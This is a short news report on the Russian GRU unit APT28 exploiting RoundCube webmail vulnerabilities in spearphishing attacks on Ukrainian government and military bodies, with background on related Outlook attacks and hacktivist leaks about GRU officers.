Russia’s GRU military hacking unit known as APT28 (Fancy Bear, Forrest Blizzard or Blue Delta) has been observed compromising government institutions and military entities involved in aircraft infrastructure in Ukraine via security flaws in vulnerable RoundCube webmail servers.

According to reports from Ukraine’s computer emergency response team (CERT-UA) and Recorded Future’s Insikt Group, the espionage campaign involved spearphishing attacks using news about Russia’s war against Ukraine to entice recipients into opening emails.

The APT28 campaign exploited three vulnerabilities in the RoundCube email software (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) to run malicious scripts designed to perform reconnaissance on RoundCube servers, redirect incoming emails to the attacker-controlled address, collect session cookies, user information, and address books

The email attachment contained JavaScript code that executed additional JavaScript payloads from the attacker-controlled infrastructure.

Recorded Future says that this campaign was carried out by the same subgroup that abused a flaw (CVE-2023-23397) in Microsoft’s Outlook email software in targeted attacks against a limited number of organizations in government, transportation, energy, and military sectors in Europe.

In April, Ukrainian hacktivists leaked the personal information and correspondence of Lieutenant Colonel Sergey Alexandrovich Morgachev, an officer of the Russian Main Intelligence Directorate of the General Staff of the Russian Army (GRU) and a suspected leader of APT28.

In May, the same hacktivists exposed the personal information and photo of Viktor Borisovich Netyksho, an officer in Russia’s Intelligence Directorate of the General Staff (GRU) wanted in the United States for his alleged involvement in the 2016 US presidential election hack.